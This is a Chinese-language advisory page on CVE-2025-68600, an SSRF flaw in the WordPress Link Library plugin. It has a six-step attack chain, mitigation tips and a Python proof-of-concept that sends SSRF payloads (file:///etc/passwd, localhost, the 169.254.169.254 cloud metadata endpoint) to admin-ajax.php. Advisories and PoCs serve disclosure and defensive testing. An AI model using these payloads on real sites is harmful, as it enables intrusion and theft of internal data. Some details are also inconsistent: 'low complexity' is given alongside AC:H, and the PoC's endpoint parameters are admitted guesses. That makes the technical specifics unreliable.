CVE-2025-68600 WordPress Link Library插件SSRF漏洞

漏洞信息

漏洞编号

CVE-2025-68600

漏洞类型

服务器端请求伪造(SSRF)

CVSS评分

4.9 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Link Library插件（Yannick Lefebvre）

漏洞概述

CVE-2025-68600是WordPress平台中Yannick Lefebvre开发的Link Library插件存在的一个服务器端请求伪造（SSRF）安全漏洞。该漏洞存在于插件的链接库功能中，攻击者可以利用此漏洞诱导服务器向任意内部或外部资源发起请求，从而获取敏感信息、扫描内部网络或绕过防火墙限制。由于该漏洞需要低权限认证才能利用（PR:L），但攻击复杂度较低（AC:H），CVSS评分达到4.9分，属于中等严重程度。攻击者无需用户交互即可实施攻击，这使得该漏洞在实际环境中具有较高的利用价值。该漏洞影响Link Library插件7.8.7及以下所有版本，2025年12月24日由Patchstack安全团队发现并披露。

技术细节

Link Library插件在处理用户输入的URL参数时存在SSRF漏洞。攻击者可以通过构造特殊的请求参数，让服务器向攻击者指定的URL发起请求。漏洞主要出现在插件的链接获取或验证功能中，程序未能正确验证用户提供的URL是否属于合法域名范围。攻击者可以利用file://、http://localhost、http://127.0.0.1等协议或内网IP地址，访问本不应该暴露的内部资源。例如，攻击者可利用该漏洞探测内网服务、读取本地文件（file:///etc/passwd）、访问管理后台或云元数据端点（AWS 169.254.169.254）。由于服务器端请求会携带服务器的身份认证信息，这可能导致更严重的信息泄露风险。攻击者通常通过WordPress的admin-ajax.php或admin-post.php接口构造恶意请求。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标WordPress网站，确认安装了Link Library插件并获取其版本号（<=7.8.7）

STEP 2

步骤2：获取低权限账户

攻击者注册为WordPress订阅者（subscriber）或其他低权限用户账户

STEP 3

步骤3：构造恶意请求

攻击者构造包含SSRF payload的HTTP请求，使用file://、http://localhost或内网IP等特殊协议和地址

STEP 4

步骤4：发送攻击请求

通过admin-ajax.php或admin-post.php等接口发送构造的请求，触发服务器端请求伪造

STEP 5

步骤5：获取敏感信息

服务器向攻击者指定的内部资源发起请求并将响应返回给攻击者，导致信息泄露

STEP 6

步骤6：横向移动或进一步利用

利用获取的内部信息（如云元数据、API密钥、内部服务地址）进行进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-68600 SSRF PoC for WordPress Link Library Plugin
# Target: WordPress site with Link Library plugin <= 7.8.7

target = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com'

# SSRF payload to access local resources or internal services
ssrf_payloads = [
    'http://127.0.0.1/admin/',
    'http://localhost/etc/passwd',
    'http://169.254.169.254/latest/meta-data/',
    'file:///etc/passwd'
]

# Typical vulnerable endpoint in Link Library plugin
vulnerable_endpoint = f'{target}/wp-admin/admin-ajax.php'

headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'User-Agent': 'SSRF-Test-Client/1.0'
}

print(f'[*] Testing CVE-2025-68600 SSRF on {target}')
print(f'[*] Target endpoint: {vulnerable_endpoint}')

# Authenticated low-privilege user required (subscriber role or higher)
cookies = {
    'wordpress_test_cookie': 'WP+Cookie+check',
    # Add valid WordPress session cookie here
}

for payload in ssrf_payloads:
    print(f'\n[*] Testing payload: {payload}')
    
    # Common parameter names in Link Library that might be vulnerable
    data = {
        'action': 'link_library_fetch',
        'url': payload,
        'link_id': '1'
    }
    
    try:
        response = requests.post(
            vulnerable_endpoint,
            data=data,
            headers=headers,
            cookies=cookies,
            timeout=10,
            verify=False
        )
        
        print(f'[+] Status Code: {response.status_code}')
        print(f'[+] Response Length: {len(response.text)} bytes')
        
        if response.status_code == 200 and len(response.text) > 0:
            print(f'[+] Potential SSRF confirmed - Response received')
            print(f'    First 200 chars: {response.text[:200]}')
            
    except requests.exceptions.RequestException as e:
        print(f'[-] Request failed: {e}')

print('\n[*] PoC execution completed')

影响范围

Link Library <= 7.8.7

Link Library 7.8.4（Patchstack确认版本）

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）限制Link Library插件的功能权限，禁用非管理员用户的链接管理功能；2）在Web服务器层面配置出站请求过滤规则，阻止服务器访问内网IP和特殊协议；3）使用云WAF或安全插件（如Wordfence、Sucuri）添加临时防护规则；4）监控服务器DNS查询和出站HTTP请求日志，及时发现异常SSRF行为；5）考虑暂时禁用Link Library插件，待官方发布安全更新后再恢复使用。